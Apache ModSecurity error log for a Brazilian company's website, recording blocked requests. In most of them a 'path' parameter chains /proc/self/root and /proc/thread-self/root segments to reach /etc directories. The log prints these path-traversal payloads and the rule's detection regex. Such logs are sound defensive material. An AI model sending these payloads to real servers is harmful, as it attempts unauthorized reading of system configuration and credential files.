[Mon Mar 16 17:48:15.110477 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:50926] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsj7ysWC90G-1nBrBfNQAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:48:24.285020 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:59986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsmLysWC90G-1nBrBfQAAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:48:25.577943 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:56884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsmf9ocpUE4ed4uDwNBwAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:48:35.876358 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:56894] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhso9SswJuvopo3lOh5mgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:48:45.040972 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:42640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsrbABkC4fWIHEf8EQegAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:48:48.479627 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.243.203:40444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhssEr9dMAiw-8KANNjiQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:48:59.963016 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:37984] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsu_9ocpUE4ed4uDwNIwAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:49:10.184902 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.241.46:51316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsxkr9dMAiw-8KANNjkgAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:49:13.683255 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:51428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsydSswJuvopo3lOh5tAAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:49:16.158810 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:51432] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhszLysWC90G-1nBrBfRgAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:50:06.708106 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.241.46:51434] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhs_s_BxrYCr4hPDw8ElgAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:50:12.178507 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:55610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtBLysWC90G-1nBrBfUwAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:50:18.687145 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:35554] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtCrysWC90G-1nBrBfWgAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:50:25.297945 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:43502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtEaTCbgAP5jq5TehF7gAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:50:39.454457 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:43504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtH7ABkC4fWIHEf8EQtwAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:50:47.298471 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:34336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtJ7ABkC4fWIHEf8EQvQAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:51:10.261580 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:40910] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtPrABkC4fWIHEf8EQ1gAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:51:17.921268 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:41086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtRdSswJuvopo3lOh6QAAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:51:49.263257 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.228.16:34960] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhtZf9ocpUE4ed4uDwNmAAAAhQ"]
[Mon Mar 16 17:52:24.719837 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:56412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtiM_BxrYCr4hPDw8FNQAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:52:35.095481 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:41744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtk9SswJuvopo3lOh6lAAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:53:02.314120 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:41438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtro6lpbStxTqkSkuEIgAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
